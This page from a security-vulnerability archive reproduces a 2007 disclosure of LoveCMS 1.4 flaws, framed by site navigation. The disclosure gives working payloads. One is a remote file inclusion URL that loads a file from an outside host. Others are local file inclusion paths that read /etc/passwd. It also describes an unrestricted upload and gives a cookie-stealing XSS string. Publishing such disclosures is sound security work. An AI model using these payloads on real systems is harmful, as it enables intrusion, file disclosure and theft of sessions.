Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [ECHO_ADV_66$2007] SendStudio <= 2004.14 Remote File Inclusion Vulnerability

  SaphpLesson v3.0 SQL Injection Exploit

  pheap [edit LFI] vulnerability

  Plantilla PHP Simple

From:laurent gaffié <none_(at)_none.com>
Date:22 февраля 2007 г.
Subject:LoveCMS 1.4 multiple vulnerabilities

rfi:
/lovecms/install/index.php?step=http://site.com/boum.txt?

lfi:
/lovecms/install/index.php?step=/etc/passwd%00
/lovecms/?load=../../../../../../../../../../etc/passwd%00

admin upload vuln :
upload any kind of file even if it's not accepted it will be stored here :
/modules/content/pictures/tmp/

xss get via error sql:
/lovecms/?load=content&id='</textarea>'"><script>
alert(document.cookie)</script>

laurent gaffie

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород